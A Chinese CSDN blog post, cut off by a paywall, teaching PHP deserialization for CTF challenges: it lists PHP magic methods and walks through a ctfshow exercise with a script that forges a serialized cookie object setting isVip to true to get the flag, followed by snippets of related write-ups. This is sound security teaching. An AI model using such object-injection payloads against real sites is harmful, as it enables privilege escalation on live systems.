反序列化的那些事儿反序列化的那些事儿

最新推荐文章于 2022-07-13 13:57:31 发布
最新推荐文章于 2022-07-13 13:57:31 发布
阅读量399 收藏
点赞数
文章标签: 系统安全 web安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MSB_WLAQ/article/details/120640148
版权
本文详细介绍了反序列化漏洞的各种利用方式,包括PHP的魔法函数、原生类利用、字符串逃逸、session反序列化等场景。通过实例解析了如何构造payload,实现flag获取或 SSRF 攻击。文章最后鼓励读者深入学习并尝试构造POP链。
摘要由CSDN通过智能技术生成

前言

各种CTF比赛随处可见反序列化的影子,让我们来了解一下!

阅读本文,需要了解PHP中类的基础知识

正文

了解反序列化,必先了解其魔法函数

1. __sleep() //在对象被序列化之前运行2. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)3. __construct() //当对象被创建时,会触发进行初始化4. __destruct() //对象被销毁时触发5. __toString()://当一个对象被当作字符串使用时触发6. __call() //在对象上下文中调用不可访问的方法时触发7. __callStatic() //在静态上下文中调用不可访问的方法时触发8. __get() //获得一个类的成员变量时调用,用于从不可访问的属性读取数据9. __set() //用于将数据写入不可访问的属性10. __isset() //在不可访问的属性上调用isset()或empty()触发11. __unset() //在不可访问的属性上使用unset()时触发12. __toString() //把类当作字符串使用时触发13. __invoke() //当脚本尝试将对象调用为函数时触发

然后了解其属性

序列化对象:private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名

让我们跟随CTF题目,来感受反序列化独有的的"魅力"

1.

error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{
  public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){
  return $this->isVip;}public function login($u,$p){
  return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){
  if($this->isVip){
  global $flag;echo "your flag is ".$flag;}else{
  echo "no vip, no flag";}}}$username=$_GET['username'];$password=$_GET['password'];if(isset($username) && isset($password)){
  $user = unserialize($_COOKIE['user']);  if($user->login($username,$password)){
  if($user->checkVip()){
  $user->vipOneKeyGetFlag();}}else{
  echo "no vip,no flag";}}

通读代码

$username&&$password存在进入反序列化$_COOKIE['user']

(cookie为可控字段)

随后便调用了login方法

public function login($u,$p){
  return $this->username===$u&&$this->password===$p;

只有类中$username和$password等于我们传入的值 ,即可返回true

进入第二个if 调用了checkVip方法

public function checkVip(){
  return $this->isVip;}

这里定义类中isVip属性为true即可

便调用了其vipOneKeyGetFlag方法 echo除了flag

思路来了,构造payload

<?class ctfShowUser{
  public $isVip=true;public $username='a';public $password='a';}$o=new ctfShowUser();echo serialize($o);?>

?username=a&passowrd=a

cookie便传值我们构造出的payload

2.

class ctfShowUser{
最低0.47元/天 解锁文章
白面安全猿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于反序列化漏洞
weixin_34226182的博客
06-29 104
0x00 关于序列化和反序列化   在了解反序列化漏洞之前需要先了解序列化和反序列化。   序列化 (Serialization)将对象的状态信息转换为可以存储或传输的形式的过程。   把字节序列恢复为对象的过程称为对象的反序列化。 0x01 关于概述反序列化漏洞   由于把字节序列恢复为对象,并且没有限制恢复对象的类型。攻击者可以传入恶意的字节序列,通过反序列化,恢复成对象,并调用其它...
ctfshow web入门 反序列化
最新发布
2301_79442654的博客
03-24 652
分析代码:如果用户名和密码参数都存在,脚本会创建一个类的实例$user。接着,调用方法尝试登录。如果登录成功(即用户名和密码与类中的默认值匹配),并且用户被标记为VIP($isVip为true),则调用方法输出$flag的值。如果登录失败或用户不是VIP,脚本将输出 "no vip, no flag"。要让程序返回true需要确保通过GET请求传递的用户名和密码与 ctfShowUser 类中定义的默认用户名和密码相匹配。默认的用户名和密码都是 'xxxxxx'。
php反序列化字符串逃逸学习
Lum1n0us's Blog
07-20 339
文章目录前言反序列化特点反序列化字符串逃逸逃逸后字符串变长web262 wp逃逸后字符串变短 前言 最近在刷ctfshow的web入门反序列化题目时,正好遇到了字符串逃逸的问题,就跟着群主的讲解视频和网上大佬的文章来学习一下。 反序列化特点 PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 看如下代码: <?php class a{ public $a = "sh
ctfshow 反序列化2
qq_61768489的博客
07-13 403
PHP的session反序列化 带你走进PHP session反序列化漏洞 - 先知社区 原理解释不错 CTFshow-web入门-反序列化_哔哩哔哩_bilibili 可参考CTFshow 反序列化 web263_Kradress的博客-CSDN博客 在index.php中 的键值写错了,那就可以通过COOKIE来控制的值,从而进行当前页面的反序列化在check.php中,引用了inc.php 在inc.php中出现关键函数可以写入文件 构造payload 开始构造payload: 从关键的
CTFSHOW-反序列化
Yb_140的博客
04-06 3534
web254 直接构造 ?username=xxxxxx&password=xxxxxx web255 这关开始使用cookie进行反序列化 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; public function checkVip(){ return $this->
UML那些事儿
05-11
2.5 序列图 2.5.1 交互 2.5.2 生命线 2.5.3 执行发生 2.5.4 消息 2.5.5 终止 2.5.6 一般次序 2.5.7 状态不变式 2.6 用例图 2.6.1 用例与执行者 2.6.2 包含关系 2.6.3 扩展关系 2.6.4 扩展点 第3章 类图(一) 3.1 ...
java那些事儿chm
03-10
4. **输入/输出流**:Java I/O系统,包括文件操作、网络通信、序列化和对象的输入输出。 5. **多线程**:线程的概念、创建和管理,同步机制如synchronized关键字、wait()、notify()方法,以及线程池的使用。 6. **...
时间序列那点事儿(二)1
08-08
时间序列分析在许多领域,如金融、气象学、生物医学和语音识别中都有广泛应用。本文主要探讨了时间序列相似度衡量方法,特别是动态时间归整(DTW, Dynamic Time Warping)算法。DTW是一种非线性的时间序列匹配技术,...
RPC那些事儿
11-11
1. **Java序列化**:Java自带的序列化机制,简单但效率较低。 2. **Protobuf**:Google的高效数据序列化协议,支持Varints编码,减小数据包大小。 3. **Thrift**:不仅是一个RPC框架,也是一个高效的序列化库。 4. *...
TP5.1 登录 配置是否登录公共函数的方法(完整的登录案例)
php菜鸟技术天地
06-27 7098
配置好后,就不需要每个控制器都需要加一个是否检查登录的函数1、在\application\admin\controller下创建Common.phpnamespace app\admin\controller; use think\Controller; use think\Request; use think\Db; class Common extends Controller { /...
php登陆页的密码处理方式分享
vip_linux的专栏
10-15 669
这篇文章介绍了php登陆页的密码处理方式,有需要的朋友可以参考一下 控制器里面:elseif(!$model->validatePassword($data->password)) 复制代码代码如下: class XBaseModel extends CActiveRecord  {      /**       * 检测用户密码       *    
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6011
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow--反序列化
qq_51684648的博客
03-15 3148
ctfshow反序列化篇(255-271) 255、 class ctfShowUser{ public $isvip=true; } $a=new ctfShowUser(); echo urlencode(serialize($a)); get传两个参数username=xxxxxx&password=xxxxxx burp抓包,cookie传参user(分号在cookie中不会被正确的上传到服务器,所以需要url编码): 256、 <?php Class ctfShowUse
[ACTF_Junior_2021] web wp
Huamang的博客
02-21 1607
baby_serialize 一题基础的反序列化 代码审计,当Username为admin的时候就给flag <?php highlight_file(__FILE__); include "flag.php"; class User{ private $Username = "0xDktb"; private $Password = "0xDktb111"; function __construct(){ $Username = "0xDktb";
反序列化字符串逃逸——初体验
D.MIND 的博客
02-27 1447
前言:从CTFshow上做的一道反序列化字符串逃逸的题,第一次接触,想了半天(可能是我太菜了>__<)后来才发现其实不难理解,真的需要动手写脚本操作一下,光看不好理解 题目链接 message.php: <?php highlight_file(__FILE__); include('flag.php'); class message{ public $from; public $msg; public $to; public $token='user
7.level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法]
qwsn
01-01 2145
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法] pop链的实质是:a类的实例化对象是b类的成员属性值,b类的实例化对象是c
ctfshow 反序列化
m0_62422842的博客
07-07 1821
涉及到的题目是web254~web266
PHP序列化时遇到一个奇怪的字符
qq_44927883的博客
11-26 307
本来想通过代码得到序列化,结果发现一个奇怪的东西 <?php class Name{ private $username = 'username'; private $password = 'password'; public function __construct($username,$password){ $this->username = $username; $this->password = $password;
Java对象序列化与反序列化详解
"本章主要介绍了Java对象的序列化与反序列化,包括基本概念、实现过程、相关接口以及注意事项。" 在Java编程中,对象的序列化与反序列化是两个重要的概念。对象序列化是将Java对象转换为可存储或可传输的二进制字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值